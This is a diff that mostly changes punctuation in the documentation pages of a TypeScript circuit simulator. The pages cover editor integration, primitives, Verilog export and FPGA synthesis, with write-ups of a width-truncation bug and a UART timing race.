+If you already have a Monaco instance (a collaborative editor with a [Yjs](https://github.com/yjs/yjs) binding, say, whose source of truth is a `Y.Text` rather than a `value`/`onChange`), use the headless primitives and keep your own `<Editor>`:
 
 ```tsx
 import { setupSimtenIntellisense, useTypeAcquisition } from '@simten/ui/monaco';
@@ -137,7 +137,7 @@ import { setupSimtenIntellisense, useTypeAcquisition } from '@simten/ui/monaco';
 useTypeAcquisition(source, monaco); // resolves third-party imports
 
 <Editor
-  path="file:///circuit.ts" // required — see below
+  path="file:///circuit.ts" // required, see below
   beforeMount={setupSimtenIntellisense}
   onMount={(editor) => bindYjs(editor)}
 />;
@@ -145,10 +145,10 @@ useTypeAcquisition(source, monaco); // resolves third-party imports
 
 `SimtenCodeEditor` is a thin wrapper over exactly these two.
 
-The model **must** have a real `file:///` URI. TypeScript resolves modules by walking up from the containing file looking for `node_modules`, and Monaco's default `inmemory://` scheme has nothing to walk — get this wrong and every import silently resolves to `any`. `SimtenCodeEditor` sets `file:///circuit.ts` for you.
+The model **must** have a real `file:///` URI. TypeScript resolves modules by walking up from the containing file looking for `node_modules`, and Monaco's default `inmemory://` scheme has nothing to walk. Get this wrong and every import silently resolves to `any`. `SimtenCodeEditor` sets `file:///circuit.ts` for you.
 
 ## Types vs execution
 
-This subpath handles **types only**. Circuit source *executes* in the [sandbox iframe](/docs/security), which resolves imports independently. The two halves never talk: code can run while its types are still loading, and an import with no published types still runs. That's why module-not-found diagnostics are suppressed while semantic validation stays on — a red squiggle on a line that works is worse than a missing completion.
+This subpath handles **types only**. Circuit source *executes* in the [sandbox iframe](/docs/security), which resolves imports independently. The two halves never talk: code can run while its types are still loading, and an import with no published types still runs. That's why module-not-found diagnostics are suppressed while semantic validation stays on: a red squiggle on a line that works is worse than a missing completion.
 
 Type acquisition fetches from jsDelivr at runtime. Pass `typeAcquisition={{ enabled: false }}` to opt out, or `{ typescriptCdn }` to self-host; every failure degrades to "no completions", never a broken editor.

--- a/apps/web/content/docs/component-model.mdx
+++ b/apps/web/content/docs/component-model.mdx
@@ -15,18 +15,18 @@ Search for any primitive, see its ports and parameters, and interact with a live
 
 ## The Core Invariant
 
-**Circuits are either structural (nodes + connections) or behavioral (eval/onTick functions). Structural circuits have zero runtime overhead — they're elaborated away before simulation.**
+**Circuits are either structural (nodes + connections) or behavioral (eval/onTick functions). Structural circuits have zero runtime overhead: they're elaborated away before simulation.**
 
-When you write a composite like `HalfAdder` using `nodes` and `connect`, you're defining structure. The simulator expands it to primitives before running — this is called **elaboration**. All runtime behavior ultimately comes from circuits with `eval` or `onTick` functions.
+When you write a composite like `HalfAdder` using `nodes` and `connect`, you're defining structure. The simulator expands it to primitives before running. This is called **elaboration**. All runtime behavior ultimately comes from circuits with `eval` or `onTick` functions.
 
 You can also write your own behavioral circuits using `eval` (combinational) or `state` + `onTick` (sequential). See the [API Reference](/docs/api-reference#behavioral-circuits) for details.
 
 ## Component Resolution
 
 When the system encounters a node:
-1. Check for `eval` / `onTick` on the circuit — if found, treat as a behavioral leaf
-2. Check for `nodes` / `connect` — if found, elaborate (expand recursively)
-3. Error — circuit has neither
+1. Check for `eval` / `onTick` on the circuit; if found, treat as a behavioral leaf
+2. Check for `nodes` / `connect`; if found, elaborate (expand recursively)
+3. Error: circuit has neither
 
 ---
 
@@ -36,13 +36,13 @@ When the system encounters a node:
 
 | Primitive | Inputs | Outputs | Description |
 |-----------|--------|---------|-------------|
-| <PrimitiveLink name="And" /> | `a: Bit`, `b: Bit` | `out: Bit` | AND — true when both inputs are true |
-| <PrimitiveLink name="Or" /> | `a: Bit`, `b: Bit` | `out: Bit` | OR — true when at least one input is true |
-| <PrimitiveLink name="Not" /> | `in: Bit` | `out: Bit` | NOT — inverts the input |
-| <PrimitiveLink name="Nand" /> | `a: Bit`, `b: Bit` | `out: Bit` | NAND — false only when both inputs are true |
-| <PrimitiveLink name="Nor" /> | `a: Bit`, `b: Bit` | `out: Bit` | NOR — true only when both inputs are false |
-| <PrimitiveLink name="Xor" /> | `a: Bit`, `b: Bit` | `out: Bit` | XOR — true when inputs differ |
-| <PrimitiveLink name="Xnor" /> | `a: Bit`, `b: Bit` | `out: Bit` | XNOR — true when inputs match |
+| <PrimitiveLink name="And" /> | `a: Bit`, `b: Bit` | `out: Bit` | AND: true when both inputs are true |
+| <PrimitiveLink name="Or" /> | `a: Bit`, `b: Bit` | `out: Bit` | OR: true when at least one input is true |
+| <PrimitiveLink name="Not" /> | `in: Bit` | `out: Bit` | NOT: inverts the input |
+| <PrimitiveLink name="Nand" /> | `a: Bit`, `b: Bit` | `out: Bit` | NAND: false only when both inputs are true |
+| <PrimitiveLink name="Nor" /> | `a: Bit`, `b: Bit` | `out: Bit` | NOR: true only when both inputs are false |
+| <PrimitiveLink name="Xor" /> | `a: Bit`, `b: Bit` | `out: Bit` | XOR: true when inputs differ |
+| <PrimitiveLink name="Xnor" /> | `a: Bit`, `b: Bit` | `out: Bit` | XNOR: true when inputs match |
 | <PrimitiveLink name="Buffer" /> | `in: Bit` | `out: Bit` | Passes input through unchanged |
 
 ### I/O
@@ -102,16 +102,16 @@ All support `width` parameter (default: 8).
 
 These components have **clocked state** that updates on the rising edge of `clk`.
 
-"Sequential" isn't a flag you set: a primitive is sequential exactly when it declares `state` (these two do), and a composite is sequential when it contains one. That same `state` declaration is what gives the circuit its single implicit clock, which is why you never wire `clk` yourself — see [How it works](/docs/how-it-works#3-sequential-vs-combinational).
+"Sequential" isn't a flag you set: a primitive is sequential exactly when it declares `state` (these two do), and a composite is sequential when it contains one. That same `state` declaration is what gives the circuit its single implicit clock, which is why you never wire `clk` yourself. See [How it works](/docs/how-it-works#3-sequential-vs-combinational).
 
 | Primitive | Inputs | Outputs | Parameters | Description |
 |-----------|--------|---------|------------|-------------|
 | <PrimitiveLink name="DFlipFlop" /> | `d: Bit` | `q: Bit`, `q_bar: Bit` | — | 1-bit register, captures `d` on clock edge |
 | <PrimitiveLink name="Register" /> | `data: Bus[N]`, `we: Bit` | `q: Bus[N]` | `width` (8), `value` (0) | N-bit register, writes when `we` is high |
 
-**Key difference:** DFlipFlop always captures its input on every clock edge. Register only writes when `we` (write enable) is high — this lets you hold a value across multiple cycles.
+**Key difference:** DFlipFlop always captures its input on every clock edge. Register only writes when `we` (write enable) is high, which lets you hold a value across multiple cycles.
 
-**Reset behavior (Verilog export):** when the exporter's auto-plumbed `rst_n` is low, both DFlipFlop and Register snap back to their `value` arg. In simulation, `sim.reset()` produces the same effect. Memory primitives (RAM, DualPortRAM) preserve their contents during reset — only writes are suppressed.
+**Reset behavior (Verilog export):** when the exporter's auto-plumbed `rst_n` is low, both DFlipFlop and Register snap back to their `value` arg. In simulation, `sim.reset()` produces the same effect. Memory primitives (RAM, DualPortRAM) preserve their contents during reset; only writes are suppressed.
 
 ### Memory
 

--- a/apps/web/content/docs/examples.mdx
+++ b/apps/web/content/docs/examples.mdx
@@ -32,7 +32,7 @@ export const HalfAdder = circuit('HalfAdder', {
 
 ## Full Adder
 
-Three bits (a + b + carry in) → sum + carry out. Reuses HalfAdder as a composite — the simulator expands it to primitives automatically.
+Three bits (a + b + carry in) → sum + carry out. Reuses HalfAdder as a composite, and the simulator expands it to primitives automatically.
 
 export const FullAdder = circuit('FullAdder', {
   inputs:  { a: bit, b: bit, cin: bit },
@@ -50,7 +50,7 @@ export const FullAdder = circuit('FullAdder', {
   circuit={FullAdder}
   showControls
   title="Full Adder"
-  description="Toggle switches — notice how carry-in affects the output"
+  description="Toggle switches, and notice how carry-in affects the output"
 />
 
 ## Counter
@@ -100,10 +100,10 @@ export const Fibonacci = circuit('Fibonacci', {
 
 ## Design Patterns
 
-**Combinational** — no state, no clock. Outputs computed directly from inputs. Examples: gates, adders, muxes, ALUs.
+**Combinational**: no state, no clock. Outputs computed directly from inputs. Examples: gates, adders, muxes, ALUs.
 
-**Sequential** — has state and clock. State updates on rising clock edge, outputs reflect current state. Examples: counters, registers, shift registers.
+**Sequential**: has state and clock. State updates on rising clock edge, outputs reflect current state. Examples: counters, registers, shift registers.
 
-**Hierarchical composition** — build complex circuits from simpler ones. FullAdder from HalfAdder, ALU from Adder+Mux, CPU from ALU+RegisterFile+Memory.
+**Hierarchical composition**: build complex circuits from simpler ones. FullAdder from HalfAdder, ALU from Adder+Mux, CPU from ALU+RegisterFile+Memory.
 
-**Feedback loops** — connect a node's output back to its input through a register. The register breaks the combinational loop by introducing a one-cycle delay. This is how counters, state machines, and CPUs work.
+**Feedback loops**: connect a node's output back to its input through a register. The register breaks the combinational loop by introducing a one-cycle delay. This is how counters, state machines, and CPUs work.

--- a/apps/web/content/docs/hardware.mdx
+++ b/apps/web/content/docs/hardware.mdx
@@ -27,11 +27,11 @@ export function PipelineStage({ number, title, subtitle, children, last }) {
 
 <div className="my-8">
 <PipelineStage number={1} title="Export" subtitle="TypeScript circuit → Verilog">
-  `exportVerilog()` flattens the circuit to primitives and emits synthesisable Verilog. Every node becomes a wire or register assignment. Any module containing sequential logic gets `clk` and `rst_n` ports auto-emitted — synchronous active-low reset; your wrapper must drive both. No simulation-only constructs remain.
+  `exportVerilog()` flattens the circuit to primitives and emits synthesisable Verilog. Every node becomes a wire or register assignment. Any module containing sequential logic gets `clk` and `rst_n` ports auto-emitted: synchronous active-low reset, and your wrapper must drive both. No simulation-only constructs remain.
 </PipelineStage>
 
 <PipelineStage number={2} title="Synthesise" subtitle="Yosys synth_ecp5 → netlist JSON">
-  Yosys parses the Verilog, infers logic, and maps it to ECP5 primitives (LUT4, TRELLIS_FF, TRELLIS_BRAM). The output is a JSON netlist — a complete description of every cell and every connection. For the Snake game this is ~44,000 lines of JSON: 774 combinational cells and 203 flip-flops.
+  Yosys parses the Verilog, infers logic, and maps it to ECP5 primitives (LUT4, TRELLIS_FF, TRELLIS_BRAM). The output is a JSON netlist, a complete description of every cell and every connection. For the Snake game this is ~44,000 lines of JSON: 774 combinational cells and 203 flip-flops.
 </PipelineStage>
 
 <PipelineStage number={3} title="Place & Route" subtitle="nextpnr-ecp5 → routed config">
@@ -39,7 +39,7 @@ export function PipelineStage({ number, title, subtitle, children, last }) {
 </PipelineStage>
 
 <PipelineStage number={4} title="Pack" subtitle="ecppack → .bit bitstream">
-  `ecppack` converts the routed config into a binary `.bit` file — the actual data that gets clocked into the FPGA's SRAM on startup.
+  `ecppack` converts the routed config into a binary `.bit` file, the actual data that gets clocked into the FPGA's SRAM on startup.
 </PipelineStage>
 
 <PipelineStage number={5} title="Flash" subtitle="openFPGALoader → FPGA SRAM" last>
@@ -53,41 +53,41 @@ The whole pipeline runs through a Docker container exposing `/synth` (Yosys) and
 
 ## Snake on the ULX3S
 
-The first end-to-end hardware demo is Snake — the same `Snake` circuit that runs in the browser simulator, exported to Verilog and wrapped with VGA timing and HDMI output, running on a [ULX3S 85K](https://ulx3s.github.io/) FPGA board.
+The first end-to-end hardware demo is Snake, the same `Snake` circuit that runs in the browser simulator, exported to Verilog and wrapped with VGA timing and HDMI output, running on a [ULX3S 85K](https://ulx3s.github.io/) FPGA board.
 
-The ULX3S carries a **Lattice ECP5 LFE5U-85F** — 84K LUTs, 130 DSP blocks, 3.5 Mb of block RAM. The Snake game uses 774 of those LUTs and 203 flip-flops. The other 83,000+ LUTs are idle.
+The ULX3S carries a **Lattice ECP5 LFE5U-85F**: 84K LUTs, 130 DSP blocks, 3.5 Mb of block RAM. The Snake game uses 774 of those LUTs and 203 flip-flops. The other 83,000+ LUTs are idle.
 
 ### What the TypeScript circuit provides
 
-`Snake` is a pure register-transfer circuit — registers, adders, comparators, muxes, and a dual-port block RAM used as a framebuffer. It exposes two ports:
+`Snake` is a pure register-transfer circuit: registers, adders, comparators, muxes, and a dual-port block RAM used as a framebuffer. It exposes two ports:
 
 ```
-in:  dir[2]       — 2-bit direction (0=up 1=right 2=down 3=left)
-     scan_addr[6] — framebuffer read address (driven by VGA counters)
-out: pixel_out[8] — pixel value at that address
+in:  dir[2]       - 2-bit direction (0=up 1=right 2=down 3=left)
+     scan_addr[6] - framebuffer read address (driven by VGA counters)
+out: pixel_out[8] - pixel value at that address
 ```
 
-No display logic, no clock generation, no IO — just game state and a pixel query interface.
+No display logic, no clock generation, no IO, just game state and a pixel query interface.
 
 ### What the Verilog wrapper adds
 
 Everything needed to actually show the game on a monitor lives in `snake_top.v`:
 
-**ECP5 PLL** — the board oscillator runs at 25 MHz. HDMI needs a 125 MHz shift clock (5× pixel clock for 10:1 TMDS serialisation). The `EHXPLLL` primitive is configured as: VCO = 500 MHz, CLKOP = 125 MHz (shift), CLKOS = 25 MHz (pixel).
+**ECP5 PLL**: the board oscillator runs at 25 MHz. HDMI needs a 125 MHz shift clock (5× pixel clock for 10:1 TMDS serialisation). The `EHXPLLL` primitive is configured as: VCO = 500 MHz, CLKOP = 125 MHz (shift), CLKOS = 25 MHz (pixel).
 
-**VGA timing** — standard 640×480 @ 60 Hz counters (`hcnt` 0–799, `vcnt` 0–524). Active area, hsync, and vsync are derived from these. The 8×8 game grid maps to 80×60 pixel cells.
+**VGA timing**: standard 640×480 @ 60 Hz counters (`hcnt` 0–799, `vcnt` 0–524). Active area, hsync, and vsync are derived from these. The 8×8 game grid maps to 80×60 pixel cells.
 
-**TMDS encoder** — the DVI 8b/10b spec encodes each 8-bit colour channel into a 10-bit transition-minimised word with DC balance tracking. This is what lets HDMI carry data reliably over long cables. Three encoders run in parallel (R, G, B). The blue channel carries hsync/vsync during blanking intervals.
+**TMDS encoder**: the DVI 8b/10b spec encodes each 8-bit colour channel into a 10-bit transition-minimised word with DC balance tracking. This is what lets HDMI carry data reliably over long cables. Three encoders run in parallel (R, G, B). The blue channel carries hsync/vsync during blanking intervals.
 
-**TMDS serialiser** — each 10-bit TMDS word must be sent as 10 serial bits at 250 Mbps (125 MHz × 2 via DDR). Two 5-bit shift registers feed a pair of `ODDRX1F` primitives — ECP5's double-data-rate output flip-flop, which outputs one bit on the rising edge and one on the falling edge of `clk_shift`.
+**TMDS serialiser**: each 10-bit TMDS word must be sent as 10 serial bits at 250 Mbps (125 MHz × 2 via DDR). Two 5-bit shift registers feed a pair of `ODDRX1F` primitives, ECP5's double-data-rate output flip-flop, which outputs one bit on the rising edge and one on the falling edge of `clk_shift`.
 
-**Direction latch** — buttons are sampled on the slow game clock and mapped to the 2-bit encoding `Snake` expects.
+**Direction latch**: buttons are sampled on the slow game clock and mapped to the 2-bit encoding `Snake` expects.
 
-**Reset driver** — the wrapper must drive the `rst_n` input on the generated module. Typical pattern: a small power-on-reset counter that holds `rst_n` low for the first ~256 cycles after bitstream load, optionally combined with a physical button (active-high pressed → `rst_n` low) for runtime restart. The `hardware/ulx3s/projects/cpu/cpu_top.v` wrapper has a worked example.
+**Reset driver**: the wrapper must drive the `rst_n` input on the generated module. Typical pattern: a small power-on-reset counter that holds `rst_n` low for the first ~256 cycles after bitstream load, optionally combined with a physical button (active-high pressed → `rst_n` low) for runtime restart. The `hardware/ulx3s/projects/cpu/cpu_top.v` wrapper has a worked example.
 
 ### The pin constraint file
 
-`ulx3s_snake.lpf` maps signal names to physical BGA ball locations. This file would be identical for any ULX3S HDMI project — it's entirely board-specific, not game-specific:
+`ulx3s_snake.lpf` maps signal names to physical BGA ball locations. This file would be identical for any ULX3S HDMI project; it's entirely board-specific, not game-specific:
 
 ```
 LOCATE COMP "clk_25mhz" SITE "G2";
@@ -95,13 +95,13 @@ LOCATE COMP "gpdi_dp[0]" SITE "A16"; IOBUF PORT "gpdi_dp[0]" IO_TYPE=LVCMOS33D D
 LOCATE COMP "gpdi_dn[0]" SITE "B16"; IOBUF PORT "gpdi_dn[0]" IO_TYPE=LVCMOS33  DRIVE=4;
 ```
 
-The `LVCMOS33D` type on the dp pins enables pseudo-differential drive — the FPGA automatically drives the dn pin as the complement without needing an explicit `OLVDS` primitive.
+The `LVCMOS33D` type on the dp pins enables pseudo-differential drive: the FPGA automatically drives the dn pin as the complement without needing an explicit `OLVDS` primitive.
 
 ---
 
 ## The 1-Bit Truncation Bug
 
-During bring-up, the snake could only move right and down. Up and left had no effect — pressing those buttons produced the same movement as their opposites.
+During bring-up, the snake could only move right and down. Up and left had no effect; pressing those buttons produced the same movement as their opposites.
 
 The visual debugger (tinting the background based on the latched direction register) confirmed the buttons were sending the right signals. The bug was deeper: in the generated Verilog, `deltaX` and `deltaY` were always positive.
 
@@ -119,11 +119,11 @@ export const Constant = circuit('Constant', {
 The Verilog exporter infers wire widths by propagating through connections. Because `Constant.out` was typed as `bit`, the `zero` and `minus1` constants both appeared 1-bit to the width inference pass. The Mux nodes computing `deltaXTemp` and `deltaYTemp` saw only 1-bit inputs and declared their outputs as 1-bit wires:
 
 ```verilog
-wire w_deltaXTemp_out;   // inferred as 1-bit — wrong
+wire w_deltaXTemp_out;   // inferred as 1-bit, wrong
 assign w_deltaXTemp_out = w_isLeft_eq ? w_minus1_out : w_zero_out;
 ```
 
-`minus1` has value 255 (`8'hFF`). Truncated to 1 bit: `1'b1`. When this feeds the next Mux — which produces `deltaX` as an 8-bit wire to match the Adder — the 1-bit `1'b1` zero-extends to `8'h01`. Going left gave deltaX = +1, identical to going right.
+`minus1` has value 255 (`8'hFF`). Truncated to 1 bit: `1'b1`. When this feeds the next Mux (which produces `deltaX` as an 8-bit wire to match the Adder), the 1-bit `1'b1` zero-extends to `8'h01`. Going left gave deltaX = +1, identical to going right.
 
 ### Fix
 
@@ -150,11 +150,11 @@ The fix highlights a general rule for synthesis: the simulator is lenient about 
 
 The `snake_top.v` wrapper has two distinct layers:
 
-**Board-agnostic HDMI output** — `tmds_encoder`, `tmds_serializer`, `ecp5pll`, and the VGA timing counters are identical for any ULX3S display project. You could replace `Snake` with any circuit that implements the `scan_addr → pixel_out` interface and get a working display.
+**Board-agnostic HDMI output**: `tmds_encoder`, `tmds_serializer`, `ecp5pll`, and the VGA timing counters are identical for any ULX3S display project. You could replace `Snake` with any circuit that implements the `scan_addr → pixel_out` interface and get a working display.
 
-**Snake-specific glue** — the cell grid counters, game clock divider, direction latch, and colour mapping (~80 lines) are the only parts that know about the game.
+**Snake-specific glue**: the cell grid counters, game clock divider, direction latch, and colour mapping (~80 lines) are the only parts that know about the game.
 
-The natural next step is a **board abstraction**: a TypeScript `board()` definition that encodes the PLL configuration, HDMI pin assignments, and peripheral interfaces, so the exporter can generate both the wrapper Verilog and the `.lpf` automatically. A circuit would only need to implement a standard display interface — the board handles everything physical. The same `Snake` circuit, targeting a different board object, would produce a bitstream for a different FPGA family without any manual Verilog changes.
+The natural next step is a **board abstraction**: a TypeScript `board()` definition that encodes the PLL configuration, HDMI pin assignments, and peripheral interfaces, so the exporter can generate both the wrapper Verilog and the `.lpf` automatically. A circuit would only need to implement a standard display interface, and the board handles everything physical. The same `Snake` circuit, targeting a different board object, would produce a bitstream for a different FPGA family without any manual Verilog changes.
 
 ---
 
@@ -166,9 +166,9 @@ The next demo after Snake is a soft RV32I CPU. Same board, same toolchain, but n
 
 `hardware/ulx3s/projects/cpu/` contains:
 
-- `cpu_top.v` — the RV32I core, BRAM-backed instruction memory (IMEM), data memory (DMEM), and a small UART TX peripheral, wrapped with the ULX3S clock pin, the `BTN_F1` reset button (pin `R1`), and TX pin assignments. The wrapper combines a power-on-reset counter and the button to drive the core's `rst_n` input — press the button to restart the CPU live.
-- `firmware/` — example programs in C (`hello.c`, `fibonacci.c`, `snake.c`) and Rust (`hello.rs`).
-- `index.ts` — the project descriptor that the build pipeline auto-discovers.
+- `cpu_top.v`: the RV32I core, BRAM-backed instruction memory (IMEM), data memory (DMEM), and a small UART TX peripheral, wrapped with the ULX3S clock pin, the `BTN_F1` reset button (pin `R1`), and TX pin assignments. The wrapper combines a power-on-reset counter and the button to drive the core's `rst_n` input; press the button to restart the CPU live.
+- `firmware/`: example programs in C (`hello.c`, `fibonacci.c`, `snake.c`) and Rust (`hello.rs`).
+- `index.ts`: the project descriptor that the build pipeline auto-discovers.
 
 The memory map is intentionally small:
 
@@ -178,7 +178,7 @@ The memory map is intentionally small:
 | DMEM   | `0x0001_0000`–`0x0001_0FFF`  | 4 KB  | Stack lives at the top, growing down                 |
 | UART   | `0x8000_0000`                | 1 reg | `*UART = byte` writes; `*UART & 1` reads TX-ready    |
 
-Software polls bit 0 of the UART register to check transmit availability, then writes the next byte. That's the entire ABI — no FIFOs, no interrupts, no DMA.
+Software polls bit 0 of the UART register to check transmit availability, then writes the next byte. That's the entire ABI: no FIFOs, no interrupts, no DMA.
 
 ### Compiling firmware
 
@@ -232,7 +232,7 @@ Three commands cover the entire develop-build-flash-observe loop. They're all ba
 
 <PipelineStage number={2} title="MCP tool" subtitle="mcp__simten__run_on_fpga">
   Same flow, exposed to Claude Code via the Simten MCP server. Claude can iterate on firmware
-  (or RTL), flash, observe UART output, and adjust — all in a tight loop without leaving the
+  (or RTL), flash, observe UART output, and adjust, all in a tight loop without leaving the
   conversation. The tool returns the same `RunResult` JSON for the agent to reason about.
 </PipelineStage>
 
@@ -246,11 +246,11 @@ Three commands cover the entire develop-build-flash-observe loop. They're all ba
 
 ### Running this yourself
 
-The synth / verify / compile pipeline runs in three container services (`apps/synth`, `apps/verifier`, `apps/compiler`). In production they're private Cloudflare workers reachable only via service binding from `@simten/web`. To use the FPGA flow from a fresh clone you run them locally — `pnpm dev:synth`, `pnpm dev:verifier`, `pnpm dev:compiler` (each starts a Docker container under `wrangler dev` on ports 8792 / 55002 / 55001). Once they're up, `pnpm fpga:run` and the `run_on_fpga` MCP tool work end to end against a connected ULX3S. See [hardware/README.md](https://github.com/simtenHQ/simten/blob/main/hardware/README.md#toolchain-prerequisites) for the env vars, board-side tools (`openFPGALoader`, `picocom`), and the udev rule note for Linux.
+The synth / verify / compile pipeline runs in three container services (`apps/synth`, `apps/verifier`, `apps/compiler`). In production they're private Cloudflare workers reachable only via service binding from `@simten/web`. To use the FPGA flow from a fresh clone you run them locally: `pnpm dev:synth`, `pnpm dev:verifier`, `pnpm dev:compiler` (each starts a Docker container under `wrangler dev` on ports 8792 / 55002 / 55001). Once they're up, `pnpm fpga:run` and the `run_on_fpga` MCP tool work end to end against a connected ULX3S. See [hardware/README.md](https://github.com/simtenHQ/simten/blob/main/hardware/README.md#toolchain-prerequisites) for the env vars, board-side tools (`openFPGALoader`, `picocom`), and the udev rule note for Linux.
 
 ### The cached fast path (in progress)
 
-A full Yosys + nextpnr-ecp5 pass takes ~30–60 seconds. Most of the time you're not changing the RTL — only the firmware blob inside IMEM. In principle the bitstream cache can be keyed on `(verilog, top, lpf, device)` and the prior `.bit` reused when only the firmware has changed, swapping the new blob in via `ecpbram` — dropping firmware-only iterations to ~3 s.
+A full Yosys + nextpnr-ecp5 pass takes ~30–60 seconds. Most of the time you're not changing the RTL, only the firmware blob inside IMEM. In principle the bitstream cache can be keyed on `(verilog, top, lpf, device)` and the prior `.bit` reused when only the firmware has changed, swapping the new blob in via `ecpbram`, dropping firmware-only iterations to ~3 s.
 
 The wiring for this is already in `lib/pipeline.ts` and `lib/ecpbram.ts`, but the path is currently blocked: when the CPU's IMEM is loaded via `$readmemh("firmware.hex")` (which is what `ecpbram` needs in order to patch), the synth container produces a bitstream whose IMEM contents are garbage, so the fast path can't be turned on without rebuilding the IMEM init flow. Until that's resolved, every firmware change pays the full synth cost. See issue #39 for the diagnostic plan.
 
@@ -260,7 +260,7 @@ The wiring for this is already in `lib/pipeline.ts` and `lib/ecpbram.ts`, but th
 
 ## The UART Skid Race
 
-After getting `hello.rs` printing "Hello, World!" reliably, the obvious next demo — `hello.c`, a 5-line C program printing "Hi there\r\n" in a loop — was intermittently flaky. Sometimes a few clean iterations, then permanent gibberish; reflashing and reopening picocom would briefly produce clean output again before drifting back.
+After getting `hello.rs` printing "Hello, World!" reliably, the obvious next demo (`hello.c`, a 5-line C program printing "Hi there\r\n" in a loop) was intermittently flaky. Sometimes a few clean iterations, then permanent gibberish; reflashing and reopening picocom would briefly produce clean output again before drifting back.
 
 ### The shape of the bug
 
@@ -268,22 +268,22 @@ The garbage on the wire was suspiciously structured: bytes appeared in **groups 
 
 Adjacent demos worked perfectly under identical hardware:
 
-- `hello.rs` — same message shape, in Rust, with `uart_putc` as a function call → ✓
-- `fibonacci.c` — many more bytes, via `static void putc()` → ✓
-- `hello.c` — three lines of inlined poll-write, no function call → ✗
+- `hello.rs`: same message shape, in Rust, with `uart_putc` as a function call → ✓
+- `fibonacci.c`: many more bytes, via `static void putc()` → ✓
+- `hello.c`: three lines of inlined poll-write, no function call → ✗
 
 The only structural difference was inter-write *slack*. Rust and `fibonacci.c` had a function call (prologue, epilogue, return) between every UART write; `hello.c` had only a load and a poll loop.
 
 ### Diagnostic spacer
 
-Adding a single tight delay after the write —
+Adding a single tight delay after the write:
 
 ```c
 *UART = c;
 for (volatile int j = 0; j < 50; j++);   // ~150 ns of nothing
 ```
 
-— made the corruption disappear instantly. So the bug was timing-sensitive at the ~150 ns scale, exactly the regime where one or two CPU pipeline cycles matter.
+This made the corruption disappear instantly. So the bug was timing-sensitive at the ~150 ns scale, exactly the regime where one or two CPU pipeline cycles matter.
 
 ### Root cause
 
@@ -293,7 +293,7 @@ for (volatile int j = 0; j < 50; j++);   // ~150 ns of nothing
 assign tx_ready = !busy;   // combinational from a flop
 ```
 
-When the CPU stored a byte, `busy` was set on the *next* clock edge. But the polling load that followed could combinationally read `busy` *during* the same cycle the store was causing it to flip. Verilog non-blocking semantics meant the load saw the old `busy = 0`, decoded `tx_ready = 1`, and the CPU happily issued the next store. The shifter — now mid-byte and `busy = 1` — hit `if (!busy)` in its always block, false, and dropped the second write on the floor. Ten writes per loop iteration, one or more *landing inside an in-flight frame*, splicing bits across UART frame boundaries. The host UART receiver re-locked onto a wrong falling edge and stayed misaligned, which explains both the "10-byte cycle, wrong values" pattern and the "open picocom and sometimes it works for a while" behaviour.
+When the CPU stored a byte, `busy` was set on the *next* clock edge. But the polling load that followed could combinationally read `busy` *during* the same cycle the store was causing it to flip. Verilog non-blocking semantics meant the load saw the old `busy = 0`, decoded `tx_ready = 1`, and the CPU happily issued the next store. The shifter, now mid-byte and `busy = 1`, hit `if (!busy)` in its always block, false, and dropped the second write on the floor. Ten writes per loop iteration, one or more *landing inside an in-flight frame*, splicing bits across UART frame boundaries. The host UART receiver re-locked onto a wrong falling edge and stayed misaligned, which explains both the "10-byte cycle, wrong values" pattern and the "open picocom and sometimes it works for a while" behaviour.
 
 ### Fix
 
@@ -325,13 +325,13 @@ end
 
 Two structural properties fall out:
 
-1. **Drops are impossible.** A `tx_write` always lands in the skid. If the skid is full the new byte overwrites — but software polling `tx_ready` correctly never gets there, because a full skid means `tx_ready = 0`.
+1. **Drops are impossible.** A `tx_write` always lands in the skid. If the skid is full the new byte overwrites, but software polling `tx_ready` correctly never gets there, because a full skid means `tx_ready = 0`.
 2. **The status flag is monotone within a cycle.** `skid_valid` changes only on clock edges, so a combinational read of `tx_ready` is stable for an entire cycle. The CPU pipeline can't catch it mid-flip the way it could with `busy`.
 
 Cost: +9 flip-flops, no change in Fmax. `hello.c` now runs cleanly without the diagnostic spacer; `hello.rs` and `fibonacci.c` were unaffected.
 
 ### The general lesson
 
-Both this story and the 1-bit truncation bug share a shape: the **simulator was lenient where the hardware is strict**. The TS RTL simulator runs every cycle as a discrete step — a polling load reads the latest committed value of `busy`, not "the value during the cycle a store is committing." Real flip-flops and combinational logic don't make that distinction; anything you read combinationally from a register that's about to change can race.
+Both this story and the 1-bit truncation bug share a shape: the **simulator was lenient where the hardware is strict**. The TS RTL simulator runs every cycle as a discrete step: a polling load reads the latest committed value of `busy`, not "the value during the cycle a store is committing." Real flip-flops and combinational logic don't make that distinction; anything you read combinationally from a register that's about to change can race.
 
-The general rule for memory-mapped status flags: **register the read path**, or put a skid (or a FIFO) in the data path so a write that arrives during the racy window is captured rather than dropped. The dumber the peripheral, the harder it is to debug this kind of intermittent corruption — and the more that lazy software (like a tight poll-write loop) will expose it.
+The general rule for memory-mapped status flags: **register the read path**, or put a skid (or a FIFO) in the data path so a write that arrives during the racy window is captured rather than dropped. The dumber the peripheral, the harder it is to debug this kind of intermittent corruption, and the more that lazy software (like a tight poll-write loop) will expose it.

--- a/apps/web/content/docs/how-it-works.mdx
+++ b/apps/web/content/docs/how-it-works.mdx
@@ -1,12 +1,12 @@
 ---
 title: How it works
-description: A short tour of Simten's model — primitives, composites, time, and export.
+description: A short tour of Simten's model: primitives, composites, time, and export.
 ---
 
 import { CircuitEmbed } from '@simten/embed'
 import { HalfAdder, FullAdder, DelayLine } from '../../src/features/splash/circuits'
 
-Five things that make Simten different from a textbook simulator. Most of this page is live circuits — read the code, hit play, drill in.
+Five things that make Simten different from a textbook simulator. Most of this page is live circuits: read the code, hit play, drill in.
 
 ## 1. Circuits are TypeScript values
 
@@ -37,7 +37,7 @@ const HalfAdder = circuit('HalfAdder', {
   }}
 />
 
-Toggle the input switches. The output reflects the change immediately because everything here is combinational logic — no clock involved.
+Toggle the input switches. The output reflects the change immediately because everything here is combinational logic, with no clock involved.
 
 ## 2. Composites zoom in
 
@@ -57,12 +57,12 @@ Hardware is recursive. A circuit is built of circuits, which are built of circui
   }}
 />
 
-This `FullAdder` is two `HalfAdder`s and an `Or` gate. Double-click `ha1` and you'll see the same circuit you wrote above — its XOR and AND gates exposed. The inspector keeps zooming as long as there's structure to peel.
+This `FullAdder` is two `HalfAdder`s and an `Or` gate. Double-click `ha1` and you'll see the same circuit you wrote above, with its XOR and AND gates exposed. The inspector keeps zooming as long as there's structure to peel.
 
 ## 3. Sequential vs combinational
 
-Combinational logic answers *what* — the output is a pure function of the inputs.
-Sequential logic remembers *when* — state advances on each clock tick.
+Combinational logic answers *what*: the output is a pure function of the inputs.
